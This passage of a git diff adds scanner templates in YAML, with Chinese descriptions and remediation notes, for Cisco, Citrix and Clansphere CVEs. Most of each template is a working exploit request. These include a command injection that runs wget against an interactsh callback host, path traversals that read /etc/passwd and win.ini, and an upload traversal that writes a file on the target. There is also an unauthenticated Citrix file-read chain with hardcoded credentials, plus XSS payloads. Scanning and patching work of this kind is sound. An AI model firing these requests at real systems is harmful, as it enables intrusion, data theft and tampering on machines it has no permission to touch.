4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 + 5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: interactsh_protocol + words: + - http + matchers-condition: and + raw: + - | + POST /storfs-asup HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded + + action=&token=`wget http://{{interactsh-url}}`&mode=`wget http://{{interactsh-url}}` diff --git a/config/51pwn/yaml/Cisco IOS/CVE-2021-1499.yaml b/config/51pwn/yaml/Cisco IOS/CVE-2021-1499.yaml new file mode 100755 index 000000000..60834899b --- /dev/null +++ b/config/51pwn/yaml/Cisco IOS/CVE-2021-1499.yaml @@ -0,0 +1,63 @@ +id: CVE-2021-1499 +info: + name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability + author: + - l0ne1y + description: |- + Cisco HyperFlex HX Data Platform 访问控制错误漏洞 + Cisco HyperFlex HX Data Platform是美国思科(Cisco)公司的一个网络设备。提供企业级的敏捷性,可扩展性,安全性和生命周期管理功能。 + + Cisco HyperFlex HX Data Platform 存在访问控制错误漏洞,攻击者可利用该漏洞可以通过向受影响的设备发送特定的HTTP请求来利用这个漏洞,将文件上传到受影响的设备。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-hyperflex-upload-KtCK8Ugz + + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/json + - type: word + condition: and + words: + - '{"result":' + - '"filename:' + - /tmp/passwd9 + matchers-condition: and + raw: + - | + POST /upload HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Encoding: gzip, deflate + Content-Type: multipart/form-data; boundary=---------------------------253855577425106594691130420583 + Origin: {{RootURL}} + Referer: {{RootURL}} + + -----------------------------253855577425106594691130420583 + Content-Disposition: form-data; name="file"; filename="../../../../../tmp/passwd9" + Content-Type: application/json + + MyPasswdNewData->/api/tomcat + + -----------------------------253855577425106594691130420583-- diff --git a/config/51pwn/yaml/Cisco SD-WAN vManage/CVE-2020-26073.yaml b/config/51pwn/yaml/Cisco SD-WAN vManage/CVE-2020-26073.yaml new file mode 100755 index 000000000..c3ad4f041 --- /dev/null +++ b/config/51pwn/yaml/Cisco SD-WAN vManage/CVE-2020-26073.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-26073 +info: + name: Cisco SD-WAN vManage Software Directory Traversal + author: + - l0ne1y + description: |- + Cisco SD-WAN vManage 信息泄露漏洞 + Cisco SD-WAN vManage是美国思科(Cisco)公司的一款可提供软件定义网络功能的软件。该软件为网络虚拟化的一种方式。 + + Cisco SD-WAN vManage Software中的application data endpoints存在信息泄露漏洞,成功的利用该漏洞可使攻击者能够进行目录遍历攻击并获得对敏感信息的访问权限。 + severity: high + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-vman-traversal-hQh24tmk + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + part: body + regex: + - 'root:.*:0:0:' + matchers-condition: and + path: + - '{{BaseURL}}/dataservice/disasterrecovery/download/token/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2Fetc%2Fpasswd' + method: GET diff --git a/config/51pwn/yaml/Cisco Unified Communications Manager/CVE-2011-3315.yaml b/config/51pwn/yaml/Cisco Unified Communications Manager/CVE-2011-3315.yaml new file mode 100755 index 000000000..8495b6f03 --- /dev/null +++ b/config/51pwn/yaml/Cisco Unified Communications Manager/CVE-2011-3315.yaml @@ -0,0 +1,26 @@ +id: CVE-2011-3315 +info: + name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal + author: + - l0ne1y + description: |- + 多个Cisco产品目录遍历漏洞 + Cisco Unified Communications Manager, Cisco Unified Contact Center Express和Cisco Unified IP Interactive Voice Response存在目录遍历漏洞,允许未验证远程攻击者获得系统中的任意文件。此漏洞是由于不正确的输入校验,允许攻击者遍历文件系统目录,攻击者向受影响系统发送特制URL可利用此漏洞。Cisco Unified Contact Center Express和Cisco Unified IP Interactive Voice Response 6.0(x)和7.0(x)版本可通过TCP 8080端口访问,而8.0(x)之后版本需要访问TCP 9080端口访问。 + severity: high + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://www.webex.com/play-webex-recording.html\nhttp://support.webex.com/support/downloads.html\nhttp://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-webex\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Cisco Unified Communications Manager/CVE-2013-5528.yaml b/config/51pwn/yaml/Cisco Unified Communications Manager/CVE-2013-5528.yaml new file mode 100755 index 000000000..d5b039135 --- /dev/null +++ b/config/51pwn/yaml/Cisco Unified Communications Manager/CVE-2013-5528.yaml @@ -0,0 +1,28 @@ +id: CVE-2013-5528 +info: + name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal + author: + - l0ne1y + description: |- + Cisco Unified Communications Manager目录遍历漏洞 + Cisco Unified Communications Manager(CUCM,Unified CM,CallManager)是美国思科(Cisco)公司的一款统一通信系统中的呼叫处理组件。该组件提供了一种可扩展、可分布和高可用的企业IP电话呼叫处理解决方案。 + + CUCM中的Tomcat服务器的管理Web界面中存在目录遍历漏洞,该漏洞源于程序没有正确过滤用户提交的输入。远程经过授权的攻击者可通过提供一系列目录遍历字符利用该漏洞读取任意文件。 + severity: medium + remediation: "官方修复方案:\n1、建议用户到官方获取最新补丁或者最新版本程序:\nhttp://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528\n\n临时修复方案:\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。" +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Citrix ShareFile/CVE-2020-8982.yaml b/config/51pwn/yaml/Citrix ShareFile/CVE-2020-8982.yaml new file mode 100755 index 000000000..b77cfa895 --- /dev/null +++ b/config/51pwn/yaml/Citrix ShareFile/CVE-2020-8982.yaml @@ -0,0 +1,34 @@ +id: CVE-2020-8982 +info: + name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read + author: + - l0ne1y + description: |- + Citrix Systems Citrix ShareFile storage zones Controller 路径遍历漏洞 + Citrix Systems Citrix ShareFile是美国思杰系统(Citrix Systems)公司的一套文件共享解决方案。storage zones Controller是其中的一个存储区控制器。 + + Citrix Systems Citrix ShareFile storage zones Controller中存在路径遍历漏洞。攻击者可利用该漏洞访问ShareFile用户的文档和文件夹。以下产品及版本受到影响:Citrix ShareFile storage zones Controller 5.9.0版本,5.8.0版本,5.7.0版本,5.6.0版本,5.5.0及之前版本。 + severity: high + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://support.citrix.com/article/CTX269106 + + **临时修复方案** + 1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。
2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'
3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。
1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。
2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。
3)Apache:修配置文件httpd.conf,把:Options Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。
4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。
4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: body + words: + - bit app support + - fonts + - extensions + matchers-condition: and + path: + - '{{BaseURL}}/XmlPeek.aspx?dt=\\..\\..\\..\\..\\..\\..\\Windows\\win.ini&x=/validate.ashx?requri' + method: GET diff --git "a/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay)/CVE-2019-19781.yaml" "b/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay)/CVE-2019-19781.yaml" new file mode 100755 index 000000000..51854d4d6 --- /dev/null +++ "b/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay)/CVE-2019-19781.yaml" @@ -0,0 +1,38 @@ +id: CVE-2019-19781 +info: + name: Citrix ADC and Gateway - Directory Traversal + author: + - organiccrap + - geeknik + description: |- + Citrix Application Delivery Controller和Citrix Systems Gateway 目录穿越漏洞可导致远程代码执行 + 漏洞原因: + + Citrix ADC(NetScalers)中的目录穿越错误,这个错误会调用perl脚本,perl脚本用于将XML格式的文件附加到受害计算机,因此产生远程执行代码。 + + 注:Citrix NetScaler ADC应用交付控制器和Citrix NetScaler网关。 + + 漏洞影响范围: + + Citrix NetScaler ADC and NetScaler Gateway version 10.5 + Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 + Citrix ADC and Citrix Gateway version 13.0 + severity: critical + remediation: |- + **官方修复方案** + 官方已发布漏洞补丁https://support.citrix.com/article/CTX267027 + + **临时修复方案** + 1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。
2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'
3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。
1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。
2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。
3)Apache:修配置文件httpd.conf,把:Options Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。
4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。
4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + words: + - '[global]' + matchers-condition: and + path: + - '{{BaseURL}}/vpn/../vpns/cfg/smb.conf' + method: GET diff --git "a/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8191.yaml" "b/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8191.yaml" new file mode 100755 index 000000000..3b2089014 --- /dev/null +++ "b/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8191.yaml" @@ -0,0 +1,41 @@ +id: CVE-2020-8191 +info: + name: Citrix ADC & NetScaler Gateway Reflected XSS + author: + - dwisiswant0 + description: |- + Citrix Systems产品跨站脚本漏洞 + + Citrix Systems Citrix Application Delivery Controller(ADC)等都是美国思杰系统(Citrix Systems)公司的产品。Citrix Application Delivery Controller是一款应用交付控制器。Citrix Systems Gateway(Citrix Systems NetScaler Gateway)是一套安全的远程接入解决方案。Citrix System SDWAN WAN-OP是一款SD-WAN(虚拟软件定义的广域网)设备。 Citrix Systems Citrix ADC、Citrix Gateway和Citrix SDWAN WAN-OP中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。以下产品及版本受到影响:Citrix ADC 13.0-58.30之前版本,12.1-57.18之前版本,12.0-63.21之前版本,11.1-64.14之前版本,10.5-70.18之前版本;Citrix Gateway 13.0-58.30之前版本,12.1-57.18之前版本,12.0-63.21之前版本,11.1-64.14之前版本,10.5-70.18之前版本;Citrix SDWAN WAN-OP 11.1.1a之前版本,11.0.3d之前版本,10.2.7之前版本。 + severity: medium + remediation: |- + **官方修复方案** + 可从以下链接下载对应系统的最新版本 + [https://www.citrix.com/downloads/citrix-adc/](https://www.citrix.com/downloads/citrix-adc/) + [https://www.citrix.com/downloads/citrix-gateway/](https://www.citrix.com/downloads/citrix-gateway/) + [https://www.citrix.com/downloads/citrix-sd-wan/](https://www.citrix.com/downloads/citrix-sd-wan/) + + **临时修复方案** + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + raw: + - | + POST /menu/stapp HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-NITRO-USER: xpyZxwy6 + + sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot diff --git "a/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8193.yaml" "b/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8193.yaml" new file mode 100755 index 000000000..0926ee6fd --- /dev/null +++ "b/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8193.yaml" @@ -0,0 +1,68 @@ +id: CVE-2020-8193 +info: + name: Citrix unauthenticated LFI + author: + - l0ne1y + description: |- + Citrix Systems产品访问控制漏洞 + Citrix Systems Citrix Application Delivery Controller(ADC)等都是美国思杰系统(Citrix Systems)公司的产品。Citrix Application Delivery Controller是一款应用交付控制器。Citrix Systems Gateway(Citrix Systems NetScaler Gateway)是一套安全的远程接入解决方案。Citrix System SDWAN WAN-OP是一款SD-WAN(虚拟软件定义的广域网)设备。 Citrix Systems Citrix ADC、Citrix Gateway和Citrix SDWAN WAN-OP中存在访问控制错误漏洞。攻击者可利用该漏洞未经身份验证访问某些URL端点。以下产品及版本受到影响:Citrix Systems Citrix ADC 13.0-58.30之前版本,12.1-57.18之前版本,12.0-63.21之前版本,11.1-64.14之前版本,10.5-70.18之前版本;Citrix Gateway 13.0-58.30之前版本,12.1-57.18之前版本,12.0-63.21之前版本,11.1-64.14之前版本,10.5-70.18之前版本;Citrix SDWAN WAN-OP 11.1.1a之前版本,11.0.3d之前版本,10.2.7之前版本。 + severity: medium + remediation: |- + **官方修复方案** + 请按以下链接下载对应系统的最新版本 + [https://www.citrix.com/downloads/citrix-adc/](https://www.citrix.com/downloads/citrix-adc/) + [https://www.citrix.com/downloads/citrix-gateway/](https://www.citrix.com/downloads/citrix-gateway/) + [https://www.citrix.com/downloads/citrix-sd-wan/](https://www.citrix.com/downloads/citrix-sd-wan/) + + **临时修复方案** + 1、前后端同时对用户输入信息进行校验,双重验证机制。
2、调用功能前验证用户是否有权限调用相关功能。
3、直接对象引用的加密资源ID,防止攻击者枚举ID,敏感数据特殊化处理。
4、采用成熟的权限管理框架,如spring security。
5、用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)优先采用在服务端关联session或加密后放在session中的方式获取。
6、必须采用表单或其他参数提交用户进行访问操作的凭证(如用户ID、产品号码、订单流水号等)时,应尽可能采用难以猜测的构造方式(增加字母及随机数字等)或采用复杂的加密算法加密后提交,应对客户端提交的凭证与会话的权限进行严格的验证,如提交的产品号码是否为隶属于登录用户的产品号码。
7、对管理功能模块进行严格的权限验证,如非必要建议不对互联网开放或进行网络层的访问控制。 +requests: +- matchers: + - type: regex + part: body + regex: + - 'root:.*:0:0:' + extractors: + - name: randkey + type: regex + regex: + - (?m)[0-9]{3,10}\.[0-9]+ + part: body + internal: true + raw: + - | + POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + X-NITRO-USER: xpyZxwy6 + X-NITRO-PASS: xWXHUJ56 + + + - | + GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 + Host: {{Hostname}} + - | + GET /menu/neo HTTP/1.1 + Host: {{Hostname}} + - | + GET /menu/stc HTTP/1.1 + Host: {{Hostname}} + - | + POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + X-NITRO-USER: oY39DXzQ + X-NITRO-PASS: ZuU9Y9c1 + rand_key: {{randkey}} + + + - | + POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + X-NITRO-USER: oY39DXzQ + X-NITRO-PASS: ZuU9Y9c1 + rand_key: {{randkey}} + + + cookie-reuse: true diff --git "a/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8194.yaml" "b/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8194.yaml" new file mode 100755 index 000000000..98456b3e0 --- /dev/null +++ "b/config/51pwn/yaml/Citrix Systems\347\273\204\344\273\266(ADC,GateWay,SD-WAN)/CVE-2020-8194.yaml" @@ -0,0 +1,37 @@ +id: CVE-2020-8194 +info: + name: Citrix ADC & NetScaler Gateway Reflected Code Injection + author: + - l0ne1y + description: |- + Citrix Systems 产品代码注入漏洞 + Citrix Systems Citrix Application Delivery Controller(ADC)等都是美国思杰系统(Citrix Systems)公司的产品。Citrix Application Delivery Controller是一款应用交付控制器。Citrix Systems Gateway(Citrix Systems NetScaler Gateway)是一套安全的远程接入解决方案。Citrix System SDWAN WAN-OP是一款SD-WAN(虚拟软件定义的广域网)设备。 + + Citrix Systems Citrix ADC、Citrix Gateway和Citrix SDWAN WAN-OP中存在代码注入漏洞。攻击者可利用该漏洞在系统上执行任意代码。以下产品及版本受到影响:Citrix Systems Citrix ADC 13.0-58.30之前版本,12.1-57.18之前版本,12.0-63.21之前版本,11.1-64.14之前版本,10.5-70.18之前版本;Citrix Gateway 13.0-58.30之前版本,12.1-57.18之前版本,12.0-63.21之前版本,11.1-64.14之前版本,10.5-70.18之前版本;Citrix SDWAN WAN-OP 11.1.1a之前版本,11.0.3d之前版本,10.2.7之前版本。 + severity: medium + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://support.citrix.com/article/CTX276688 + + **临时修复方案** + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: word + part: header + words: + - application/x-java-jnlp-file + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + GET /menu/guiw?nsbrand=1&protocol=nonexistent.1337">&id=3&nsvpx=phpinfo HTTP/1.1 + Host: {{Hostname}} + Cookie: startupapp=st diff --git a/config/51pwn/yaml/Clansphere CMS/CVE-2021-27310.yaml b/config/51pwn/yaml/Clansphere CMS/CVE-2021-27310.yaml new file mode 100755 index 000000000..f6302e75c --- /dev/null +++ b/config/51pwn/yaml/Clansphere CMS/CVE-2021-27310.yaml @@ -0,0 +1,35 @@ +id: CVE-2021-27310 +info: + name: Clansphere CMS 2011.4 - Reflected Cross-Site Scripting (XSS) + author: + - l0ne1y + description: |- + Clansphere CMS 跨站脚本漏洞 + Clansphere CMS是OpenSourceCMS.com开源的一个应用系统。提供用于构建网站的CMS框架。 + + Clansphere CMS 2011.4 存在跨站脚本漏洞,该漏洞源于language参数。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.opensourcecms.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/mods/clansphere/lang_modvalidate.php?language=language%27%22()%26%25%3Cyes%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&module=module' + method: GET diff --git a/config/51pwn/yaml/ClinicCases/CVE-2021-38704.yaml b/config/51pwn/yaml/ClinicCases/CVE-2021-38704.yaml new file mode 100755 index 000000000..59783daa4 --- /dev/null +++ 